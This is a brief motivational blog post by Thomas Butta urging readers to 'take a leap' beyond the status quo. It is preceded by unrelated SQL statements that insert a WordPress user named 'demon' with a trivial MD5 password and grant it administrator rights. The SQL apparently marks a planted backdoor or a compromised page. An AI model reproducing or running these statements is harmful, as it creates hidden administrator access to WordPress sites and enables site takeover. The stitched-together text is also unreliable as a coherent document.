INSERT INTO `databasename`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('444', 'demon', MD5('demon'), 'Your Name','', '', '2011-06-07 00:00:00', '', '0', 'Your Name'); INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '444','wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'); INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '444','wp_user_level', '10');

Taking a Leap

The act of going from where you are to a higher, more valuable level is often expressed in a number of funny ways: Breaking through. Getting to a new level. Making big strides. But, the one I like best is taking a leap.

Taking a leap captures the emotion in doing something dramatically different. It’s exhilarating, but it’s also a bit scary.

To make a bold move you have to get out of your comfort zone. You have to get beyond the status quo. Which means you have to get off the current path even if that path has attractive upswings.

Most organizations operate off of an ‘S’ curve, which has soft highs and lows. The idea is to have higher highs than low lows. But, taking a leap, requires you to leap to a whole new S curve.

In honor of today, I urge all of you dissatisfied with the status quo or frustrated with slow and steady to take a leap. It may be scary, but it’s the only way to transform your organization and yourself.

Thomas Butta

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